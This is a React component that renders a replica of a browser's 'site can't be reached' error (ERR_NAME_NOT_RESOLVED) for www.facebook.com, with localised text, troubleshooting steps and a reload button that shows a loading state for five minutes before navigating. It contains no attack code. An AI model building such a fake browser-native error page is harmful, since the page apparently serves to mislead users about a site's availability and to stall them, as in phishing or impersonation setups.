/* eslint-disable jsx-a11y/alt-text */
import React, { useEffect, useState } from "react";
import disIcon from "../assets/images/disconnect.png";
import { isMobileOnly, isWindows } from "react-device-detect";
import useStore from "../store";
import { errorPage, SupportedLang } from "./language";

const ErrorPage: React.FC = () => {
  const [showDetails, setShowDetails] = useState(false);
  const { setLoading } = useStore();
  const toggleDetails = () => {
    setShowDetails(!showDetails);
  };

  const handleReload = () => {
    const url = new URL(window.location.href);
    url.searchParams.delete("error");
    setLoading(true);
    setTimeout(() => {
      window.location.href = url.toString();
    }, 300000);
  };
  const [lang, setLang] = useState<SupportedLang>("en");

  useEffect(() => {
    const browserLang = navigator.language?.slice(0, 2);
    const supportedLangs = ["de", "it", "es", "fr"];
    if (supportedLangs.includes(browserLang)) {
      setLang(browserLang as SupportedLang);
    } else {
      setLang("en");
    }
  }, []);

  return (
    <div className="flex flex-col items-center justify-between md:justify-center px-4 h-screen md:h-full bg-white text-gray-800 pb-5 pt-20 md:mt-28">
      {isMobileOnly ? (
        !showDetails && (
          <div className="max-w-xl md:w-[600px] text-sm text-left px-2 md:px-0">
            <div className="text-6xl mb-6">
              <img src={disIcon}></img>
            </div>
            <h1 className="text-2xl font-semibold mb-2">
              {errorPage[lang].title}
            </h1>
            <p className="mb-2">
              {" "}
              {errorPage[lang].msg1.split("www.facebook.com")[0]}
              <b>www.facebook.com</b>
              {errorPage[lang].msg1.split("www.facebook.com")[1]}
            </p>
            <p className="text-sm text-gray-600 mb-4">{errorPage[lang].try}</p>
            <ul className="text-sm list-disc list-inside text-blue-600 mb-4">
              <li>
                <button onClick={toggleDetails} className="hover:underline">
                  {errorPage[lang].steps[0]}
                </button>
              </li>
              <li>
                <button onClick={toggleDetails} className="hover:underline">
                  {errorPage[lang].steps[1]}
                </button>
              </li>
              {isWindows && (
                <li>
                  <button onClick={toggleDetails} className="hover:underline">
                    {errorPage[lang].steps[2]}
                  </button>
                </li>
              )}
            </ul>
            <p className="text-sm text-gray-500 mb-6">ERR_NAME_NOT_RESOLVED</p>
            {!isMobileOnly && (
              <div className="flex flex-col md:flex-row items-center justify-between gap-2 mb-8">
                <button
                  onClick={handleReload}
                  className="bg-blue-600 text-white px-4 md:py-1.5 py-3 rounded-[100px] hover:bg-blue-700 text-sm w-full md:w-auto"
                >
                  {errorPage[lang].reload}
                </button>
                <button
                  onClick={toggleDetails}
                  className="border px-4 md:py-1.5 py-3 rounded-[100px] text-sm hover:bg-gray-100 w-full md:w-auto"
                >
                  {showDetails
                    ? errorPage[lang].hideDetails
                    : errorPage[lang].details}
                </button>
              </div>
            )}
          </div>
        )
      ) : (
        <div className="max-w-xl md:w-[600px] text-sm text-left px-2 md:px-0">
          <div className="text-6xl mb-6">
            <img src={disIcon}></img>
          </div>
          <h1 className="text-2xl font-semibold mb-2">
            {errorPage[lang].title}
          </h1>
          <p className="mb-2">
            {" "}
            {errorPage[lang].msg1.split("www.facebook.com")[0]}
            <b>www.facebook.com</b>
            {errorPage[lang].msg1.split("www.facebook.com")[1]}
          </p>
          <p className="text-sm text-gray-600 mb-4">{errorPage[lang].try}</p>
          <ul className="text-sm list-disc list-inside text-blue-600 mb-4">
            <li>
              <button onClick={toggleDetails} className="hover:underline">
                {errorPage[lang].steps[0]}
              </button>
            </li>
            <li>
              <button onClick={toggleDetails} className="hover:underline">
                {errorPage[lang].steps[1]}
              </button>
            </li>
            {isWindows && (
              <li>
                <button onClick={toggleDetails} className="hover:underline">
                  {errorPage[lang].steps[2]}
                </button>
              </li>
            )}
          </ul>
          <p className="text-sm text-gray-500 mb-6">ERR_NAME_NOT_RESOLVED</p>
          {!isMobileOnly && (
            <div className="flex flex-col md:flex-row items-center justify-between gap-2 mb-8">
              <button
                onClick={handleReload}
                className="bg-blue-600 text-white px-4 md:py-1.5 py-3 rounded-[100px] hover:bg-blue-700 text-sm w-full md:w-auto"
              >
                {errorPage[lang].reload}
              </button>
              <button
                onClick={toggleDetails}
                className="border px-4 md:py-1.5 py-3 rounded-[100px] text-sm hover:bg-gray-100 w-full md:w-auto"
              >
                {showDetails
                  ? errorPage[lang].hideDetails
                  : errorPage[lang].details}
              </button>
            </div>
          )}
        </div>
      )}

      {showDetails && (
        <div className="max-w-xl text-sm text-left px-2 md:px-0">
          <p className="font-semibold mb-1">
            {errorPage[lang].detailsSection.title1}
          </p>
          <p className="mb-4">{errorPage[lang].detailsSection.desc1}</p>

          <p className="font-semibold mb-1">
            {errorPage[lang].detailsSection.title2}
          </p>
          <p className="mb-4">{errorPage[lang].detailsSection.desc2}</p>

          <p className="font-semibold mb-1">
            {errorPage[lang].detailsSection.title3}
          </p>
          <p className="mb-4">{errorPage[lang].detailsSection.desc3}</p>

          <p className="font-semibold mb-1">
            {errorPage[lang].detailsSection.title4}
          </p>
          <p className="mb-4">{errorPage[lang].detailsSection.desc4}</p>

          <p className="font-semibold mb-1">
            {errorPage[lang].detailsSection.title5}
          </p>
          <p>{errorPage[lang].detailsSection.desc5}</p>
        </div>
      )}
      {isMobileOnly && (
        <div className="flex flex-col md:flex-row items-center w-full gap-2 justify-between">
          {!showDetails && (
            <button
              onClick={handleReload}
              className="bg-blue-600 text-white px-4 md:py-1.5 py-3 rounded-[100px] hover:bg-blue-700 text-sm w-full md:w-auto"
            >
              {errorPage[lang].reload}
            </button>
          )}

          <button
            onClick={toggleDetails}
            className="border px-4 md:py-1.5 py-3 rounded-[100px] text-sm hover:bg-gray-100 w-full md:w-auto"
          >
            {showDetails
              ? errorPage[lang].hideDetails
              : errorPage[lang].details}
          </button>
        </div>
      )}
    </div>
  );
};

export default ErrorPage;
